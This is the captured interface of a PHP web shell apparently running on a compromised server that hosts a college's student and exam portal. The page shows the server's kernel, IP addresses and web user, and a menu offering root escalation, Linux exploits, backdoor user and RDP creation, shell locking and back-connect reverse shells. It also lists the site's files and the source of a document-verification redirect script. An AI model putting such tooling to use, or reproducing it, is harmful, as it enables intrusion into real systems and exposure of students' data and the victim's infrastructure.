Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.149.243.29
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
bnu /
[ HOME SHELL ]
Name
Size
Permission
Action
admupload
[ DIR ]
drwxrwsrwx
backup
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxr-sr-x
halltickets
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxr-sr-x
img
[ DIR ]
drwxr-sr-x
imported_files
[ DIR ]
drwxrwsrwx
misc_files
[ DIR ]
drwxrwxrwx
notifications
[ DIR ]
drwxrwxrwx
student_photos
[ DIR ]
drwxrwsrwx
study_material
[ DIR ]
drwxrwsrwx
teacher_photos
[ DIR ]
drwxrwsrwx
timetable
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwsrwx
MainPage.html
21.65
KB
-rwxr-xr-x
collegeInfoPopup.html
4.35
KB
-rwxr-xr-x
docverify.php
818
B
-rw-rw-r--
flash.html
2.23
KB
-rwxr-xr-x
forgotpassword.html
3.38
KB
-rwxr-xr-x
getAppdet.php
8
KB
-rw-rw-r--
getfeepaid.php
9.24
KB
-rw-r--r--
homepage.html
3.35
KB
-rwxr-xr-x
index.php
5.09
KB
-rwxr-xr-x
index_stop.html
6.23
KB
-rwxr-xr-x
indexlogin.html
6.2
KB
-rwxr-xr-x
pgadm.php
13.81
KB
-rw-rw-r--
pgadmfeepaid.php
15.32
KB
-rw-r--r--
timetable.php
2.86
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docverify.php
<?php $v1 = $_GET['v1']; $varr = explode('_',$v1); if(count($varr) == 1) { $v1 = $varr[0]; $v5 = '030'; $v6 = 'DC'; } else { $v1 = $varr[2]; $v5 = $varr[0]; $v6 = $varr[1]; } $v2 = $_GET['v2'];//exam A $v3 = $_GET['v3'];//year 20172 $v4 = substr($v3,-1);//type 2 $v3 = substr($v3, 0, -1); //mc_033_regno_exam_year_type.pdf $filename = $v6.'_'.$v5.'_'.$v1.'_'.$v2.'_'.$v3.'_'.$v4.'.pdf'; //var_dump($filename); $url = "https://university-marks-cards.s3.ap-south-1.amazonaws.com/030/doc_verify/".$filename; Redirect($url, true); function Redirect($url, $permanent = false) { if (headers_sent() === false) { header('Location: ' . $url, true, ($permanent === true) ? 301 : 302); } else { echo "header sent"; } exit(); } ?>
Close